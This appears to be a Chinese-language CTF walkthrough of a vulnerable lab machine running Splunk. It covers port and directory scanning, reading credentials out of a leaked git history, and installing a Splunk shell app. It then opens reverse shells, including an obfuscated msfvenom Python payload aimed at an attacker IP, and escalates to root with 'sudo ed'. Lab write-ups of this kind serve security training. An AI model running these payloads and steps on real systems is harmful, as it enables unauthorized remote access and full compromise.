一、信息收集
1、查看靶机的MAC地址:
2、查看靶机的ip地址:
nmap 192.168.13.0/24
3、查看靶机开放的端口:
nmap -p- -sC -sT -sV -A 192.168.13.159
4、分别访问靶机的8089、55555和61337端口,发现在61337端口有一个登录框:
点击services和servicesNS是一个登录框
5、扫描各个网页的目录,查看是否有有效信息:
dirsearch -u "https://192.168.13.159:8089" 这个目录里面经过查看几乎没有什么有效信息
dirsearch -u "http://192.168.13.159:55555/" 发现这个目录里有.git源码泄露
dirsearch -u "http://192.168.13.159:61337" 这个登录页面扫描出来几乎都是404,没有有效信息
6、访问.git目录,并查看里面的内容:
7、在.git/logs/HEAD文件中,在里面发现一个clone记录:
8、对代码仓库进行clone,并查看源代码结构:
git clone https://github.com/ameerpornillos/flappy
9、使用git log命令用于显示代码提交的历史日志记录,在历史记录中找到一个secret记录,发现是一个账号和密码:
git log -p+sputnik:ameer_says_thank_you_and_good_job
10、使用账号和密码登录61337端口:
账号:sputnik
密码:ameer_says_thank_you_and_good_job
11、在splunk上安装github公开工具,获取其shell并武器化:
从安装手册中得知,首先从 https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz 下载版本,然后在splunk中选择"Manage Apps" 并且点击 "Install app from file"
12、上载之后重启使其生效:
13、重启后输入账号密码重新登录后发现已经上传成功:
14、点击权限,选择所有应用然后保存:
15、选择app下的 Search&Reporting功能,在Search栏中可以进行命令执行:
16、反弹shell:
17、kali开启监听:
nc lvvp 5555
18、反弹成功并且查看到用户权限为普通用户:
19、获取一个交互式命令执行环境:
which python,发现本机安装了python环境:
msfvenom -p cmd/unix/reverse_python lhost=192.168.13.128 lport=6666 R
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkFELgkAMx7+K+HQHMbsLxIh7kDCIqCB9l7wulOxOnH7/0gvao3vY2Pbb/mPNu3P9EKDTLzMEk61mj2PV9U4bRFJ0PtnNvnY4qFBsJYg4AbEBIZOQ9Ke9Kv4aqaHyQuAD+2XpoTxesoLK+0Z+3Z/KvLhl6ZnTNaCdtUYPjE1XkLlJlFPUITzGTjKEZ9Ma6xgn9HoxKRaTkpKd+v8R9L1tWRhVjY2wDvkHQj1eJA==')[0])))"
使用之前获得的shell执行命令,再监听6666端口,前一次执行命令报错是因为忘记监听了:
反弹成功,执行python -c 'import pty;pty.spawn("/bin/bash")'获得交互式shell:
二、提权
1、查看是否具有sudo权限:
sudo -l
2、查询ed进行sudo提权的命令,并使用命令进行提权,成功提到root权限:
sudo ed
!/bin/sh
